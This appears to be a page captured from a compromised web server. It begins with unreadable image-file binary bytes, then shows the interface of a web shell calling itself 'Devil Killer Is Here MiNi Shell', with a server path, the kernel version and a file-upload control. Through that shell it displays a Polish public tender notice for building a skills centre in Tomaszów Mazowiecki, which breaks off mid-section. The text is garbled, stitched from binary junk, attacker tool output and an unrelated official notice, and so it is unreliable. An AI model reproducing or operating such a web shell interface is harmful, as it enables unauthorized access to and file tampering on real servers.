JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250609/0026980201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie Branżowego Centrum Umiejętności w Tomaszowie Mazowieckim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT TOMASZOWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. św. Antoniego 41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat-tomaszowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.powiat-tomaszowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie Branżowego Centrum Umiejętności w Tomaszowie Mazowieckim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-36417cc2-84de-47ed-84ee-c8367b12410f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00269802</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00122917/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Utworzenie Branżowego Centrum Umiejętności w Tomaszowie Mazowieckim TRYB ZAPROJEKTUJ i WYBUDUJ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> środki w ramach Konkursu : „Utworzenie i wsparcie funkcjonowania 120 branżo wych centrów umiejętności (BCU), realizujących koncepcję centrów doskonałości zawodowej (CoVEs)” w ramach Krajowego Planu Odbudowy i Zwiększania Odporności </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-36417cc2-84de-47ed-84ee-c8367b12410f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl//</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. W postępowaniu o udzielenie<br/> zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy<br/> użyciu Platformy e-Zamówienia, która jest dostępna pod<br/> adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej: zamowienia@powiat-tomaszowski.pl, z zastrzeżeniem pkt 14.1<br/> SWZ.<br/> 11.2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/> 11.4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/> „Wykonawca” na Platformie<br/> e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów<br/> oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/> Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/> oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/> 11.5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e<br/>Zamówienia ani logowania do Platformy e-Zamówienia.<br/> 11.6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/> zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/> Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/> dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/> konkursie.<br/> 11.7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia , o którym mowa w pkt 11.6 SWZ, sporządza się w<br/> postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w<br/> sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/> elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych<br/> (zamawiający dopuszcza także format RAR) i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1<br/> ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/> 11.8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w pkt 11.6 SWZ,<br/> przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/> a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności<br/> (zamawiający dopuszcza także format RAR) z uwzględnieniem rodzaju przekazywanych danych (i przekazuje się jako załącznik),<br/> lub<br/> b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/> wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/> 11.9. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/> stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej<br/> konkurencji (t. j. Dz. U. z 2022 r., poz. 1233 ze zm.), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/> wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/> przedsiębiorstwa”.<br/> 11.10. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale 13 SWZ) odbywa<br/> się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/> komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/> zadawanie pytań i udzielanie odpowiedzi.<br/> Pełna informacja dot. wymagań zawarta w SWZ w Rozdziale 11.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/> 1) jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/> 2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/> Ogłoszenie nr 2025/BZP 00107711/01 z dnia 2025-02-17<br/> 2025-02-17 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/> podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/> udzielenie zamówienia publicznego na zadanie pn.: „Utworzenie Branżowego Centrum Umiejętności w Tomaszowie Mazowieckim”<br/> prowadzonym w trybie podstawowym bez negocjacji;<br/> 3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/> w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/> 4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/> postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność;<br/> 5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/> w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/> określonych danych wynikają z ustawy Pzp;<br/> 6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/> 22 RODO;<br/> 7) Wykonawca posiada:<br/> − na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/> − na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/> o udzielenie zamówienia<br/> publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz<br/> jego załączników;<br/> − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> przypadków, o których mowa w art. 18 ust. 2 RODO;<br/> − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/> danych osobowych narusza przepisy RODO;<br/> 8) Wykonawcy nie przysługuje:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/> W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/> niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/> mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/> publicznego lub konkursu.<br/> Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/> w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/> konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/> Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/> do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/> W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/> mowa w art. 15 i art. 16 roz....</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.17.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mazowieckim” poprzez pełne zaprojektowanie i kompleksową budowę budynku Branżowego Centrum Umiejętności wraz z<br/> zagospodarowaniem terenu i uzyskaniem decyzji administracyjnych, w tym ostatecznej decyzji o pozwoleniu na<br/> użytkowanie.<br/> 4.2. Na przedmiot zamówienia składa się:<br/> 1) Opracowanie pełnej Dokumentacji Projektowej dla całej inwestycji zgodnie z PFU, SWZ, umową, obowiązującymi przepisami,<br/> 2) Budowa budynku nowego zgodnie z wykonaną dokumentacją oraz PFU, SWZ, umową, obowiązującymi przepisami.<br/> 3) Wykonanie robót budowlanych w istniejącym budynku H szkoły<br/> w zakresie niezbędnym dla połączenia z nowym obiektem zgodnie z wykonaną dokumentacją oraz PFU, SWZ, umową,<br/> obowiązującymi przepisami,<br/> 4) Zagospodarowanie terenu zgodnie z wykonaną dokumentacją oraz PFU, SWZ, umową, obowiązującymi przepisami,<br/> 5) Dostawę i montaż pierwszego wyposażenia nowego budynku zgodnie<br/> z wykonaną dokumentacją oraz PFU, SWZ, umową, obowiązującymi przepisami.<br/> 6) Wyposażenie obiektu w elementy identyfikacji wizualnej zgodnie z wykonaną dokumentacją oraz PFU, SWZ, umową,<br/> obowiązującymi przepisami,<br/> w szczególności: logo wewnętrzne i zewnętrzne, tablice informacyjne i przydrzwiowe, piktogramy, plany tyflograficzne,<br/> pylon.<br/> 7) Pozostałe obowiązki Wykonawcy:<br/> a) Zapewnienie sprawowania nadzoru autorskiego przez wszystkich projektantów oraz wypełniania przez nich pozostałych<br/> obowiązków zgodnie z ustawą Prawo budowlane i niniejszą umowa,<br/> b) Ustanowienie i zapewnienie wykonywania obowiązków kierownika budowy w rozumieniu przepisów art. 22 ustawy Prawo<br/> budowlane oraz branżowych kierowników robót.<br/> c) Opracowanie wszelkich niezbędnych dokumentów, uzyskanie wszelkich niezbędnych: stanowisk, opinii, decyzji,<br/> ekspertyz, etc., w celu doprowadzenia całej inwestycji do użytkowania i uzyskania pozwolenia na użytkowanie wraz z<br/> uzyskaniem w imieniu zamawiającego decyzji o pozwoleniu na użytkowanie (decyzja z klauzulą ostateczności).<br/> d) Opracowanie i przekazanie Zmawiającemu dokumentacji powykonawczej – 2 kpl + wersja elektroniczna.<br/> e) Na każdym etapie projektowania i budowy Branżowego Centrum Umiejętności w Tomaszowie Mazowieckim Wykonawca<br/> ma obowiązek zapewnić zgodność z dokumentem Zgodność przedsięwzięć finansowanych ze środków Unii Europejskiej, w<br/> tym realizowanych w ramach Krajowego Planu Odbudowy i Zwiększania Odporności, z zasadą „nie czyń znaczącej szkody”- zasadą DNSH PODRĘCZNIK DLA BENEFICJENTA&#34;,<br/> f) Wykonawca zobowiązany jest do zaprojektowania i wykonania obiektu w pełni dostosowanego dla osób<br/> niepełnosprawnych i ze szczególnymi potrzebami – wg obowiązujących przepisów, w tym ustawy z dnia 19 lipca 2019r. o<br/> zapewnianiu dostępności osobom ze szczególnymi potrzebami w szczególności art. 6 – Wykonawca musi wypełnić zapisy<br/> zawarte w Ustawie z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami, w szczególności<br/> Wykonawca spełni minimalne wymagania służące zapewnieniu dostępności osobom ze szczególnymi potrzebami (o których<br/> mowa w art. 6 ww. ustawy). W przypadku stwierdzenia braku możliwości zapewnienia dostępności osobom ze szczególnymi<br/> potrzebami w zakresie dostępności architektonicznej i informacyjno-komunikacyjnej, należy odnieść się do zapisów<br/> zawartych w art. 7 ww. ustawy,<br/> g) wykonanie zamówienia w pełnej zgodności z Wytycznymi Technicznymi DNSH, w szczególności budowa nowych<br/> budynków musi być zgodna ze standardem budynków o niemal zerowym zużyciu energii, określonym w dyrektywie w<br/> sprawie charakterystyki energetycznej – co Wykonawca niniejszym gwarantuje, że wypełni i uzyska/osiągnie.<br/> h) wykonanie zamówienia zgodnie z obowiązującymi przepisami, normami, wiedzą techniczną i sztuką budowlaną , w tym<br/> zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim<br/> powinny odpowiadać budynki i ich usytuowanie,<br/> i) wykonanie zamówienia w pełnej zgodności z „Wytycznymi Technicznymi dotyczącymi stosowania zasady „nie czyń<br/> poważnych szkód” na podstawie rozporządzenia ustanawiającego Instrument na rzecz Odbudowy i Zwiększania Odporności<br/> 2021/C 58/01”;<br/> j) budynek Branżowego Centrum Umiejętności oddawany do użytkowania musi spełniać standardy budynków o niemal<br/> zerowym zużyciu energii, określonym w dyrektywie Parlamentu Europejskiego i Rady 2010/31/UE z dnia 19 maja 2010 r. w<br/> sprawie charakterystyki energetycznej budynków – co wykonawca niniejszym gwarantuje i oświadcza, że uzyska/osiągnie.<br/> UWAGA <br/>Zamawiający dopuszcza technologię modułową pod warunkiem, że zaproponowana i zastosowana przez Wykonawcę<br/> technologia modułowa nie wpłynie na jakość i funkcjonalność obiektu, a także technologia modułowa (po posadowieniu) i<br/> obiekt, który w jej wyniku powstanie, nie będą mieć charakteru mobilnego.<br/> 4.3. Szczegółowe warunki realizacji Umowy i jej zakres przedmiotowy, w tym zakres prac projektowych oraz robót określa<br/> Program funkcjonalno-użytkowy wraz z aktualizacją<br/> (dalej zwany również: „PFU”) wraz z załącznikami oraz Projekt umowy - Załącznik Nr 2 do SWZ, a w zakresie<br/> wykonywanych robót opracowana dokumentacja projektowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262350-9 - Betonowanie bez zbrojenia</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45432120-1 - Instalowanie nawierzchni podłogowych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">: Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących<br/> kryteriów oceny ofert:<br/> Lp. Nazwa kryterium Znaczenie kryterium<br/> (w %)<br/> 1 Cena 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 